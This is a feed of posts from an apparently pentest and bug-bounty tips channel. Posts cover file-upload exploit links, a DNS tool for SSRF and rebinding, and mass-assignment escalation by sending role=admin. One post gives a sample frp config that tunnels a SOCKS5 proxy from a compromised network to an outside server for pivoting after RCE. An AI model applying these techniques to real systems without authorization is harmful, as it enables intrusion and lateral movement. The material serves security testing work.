Hack3rScr0lls

2021-06-14 13:50:35 So, you can upload a file to web application..

Bonus! Repo with slightly old exploits for image upload:
github.com/barrracud4/image-upload-exploits

XMind source:
github.com/hackerscrolls/SecurityTips/blob/master/MindMaps/File_upload_bugs.xmind Open / Comment

2021-06-14 13:49:01 Open / Comment

2021-03-01 14:52:33 The new tool 1u.ms by @emil_lerner is a good replacement of dnschef for pentesters and bug bounty, pretty useful for any kind of SSRF attack and DNS rebinding. You can dynamically request a specific IP address just using something like a command in the subdomain value.

It's also available online at http://1u.ms

Highly recommend. Open / Comment

2021-02-27 12:13:03 Found a hidden HTTP param? Look deeper, maybe there is a mass assignment/autobinding vulnerability.

This issue occurs when a web app automatically binds HTTP parameters to object fields of the same name without filtering fields that should not be assigned.

User class has fields: email, password, role. At sign-up, the browser sends only email and password. The web app binds parameters to a user object and sets role to default ‘user’.

If you send the role=admin, the web app will assign it to the role field bypassing the default value. (params and code examples are shown in the picture)

How to find:
> Identify the framework (affected: RoR, ASP.NET, Spring and other)
> Use Param Miner to find hidden params
> Make a custom dictionary with the site content (HTML and JS)

Sometimes changes in objects are hidden too and you need to closely explore the app.

Source

#Web #Hidden #Parameters Open / Comment

2021-02-27 12:12:36 Open / Comment

2021-02-17 14:36:24 Just all public reports with attachment links grabbed from hackerone by @zeroc00I

Useful for finding attack vectors and ideas for bug bounty

https://github.com/bminossi/AllVideoPocsFromHackerOne

#BugBounty Open / Comment

2021-02-13 12:53:35 Socks to the internal network

Looking for a stable reverse proxy for pivoting? Check frp!

After getting RCE, you have to expand the attack to internal services. To do this, you need a stable channel to the internal network. We recommend frp – fast reverse proxy.

The client (frpc) connects from the network behind NAT to the public server (frps) and establishes the channel.

> Supports auth and TLS
> SOCKS5 proxy
> HTTP proxy
> Multiplatform
> Easy to use

A lot of other features for pivoting!

Sample config for SOCKS proxy:
frps.ini (server)
[common]
bind_port = 7000
token = s3cret

frpc.ini (client)
[common]
server_addr = 3.1.33.7
server_port = 7000
token = s3cret

[plugin_socks5]
type = tcp
remote_port = 6005
plugin = socks5
plugin_user = suser
plugin_passwd = pa$sw0rd

https://github.com/fatedier/frp

#Pivoting #Proxy Open / Comment

2021-02-13 12:52:58 Open / Comment

2020-12-31 12:19:00 Hack3rScr0lls pinned «We have updated the github repository with all the tricks from the past year. Github Twitter HackerScrolls team: @barracud4_ and @igc_iv Good luck & have fun in New Year 2021!» Open / Comment

2020-12-31 12:18:46 We have updated the github repository with all the tricks from the past year.

Github
Twitter
HackerScrolls team: @barracud4_ and @igc_iv

Good luck & have fun in New Year 2021! Open / Comment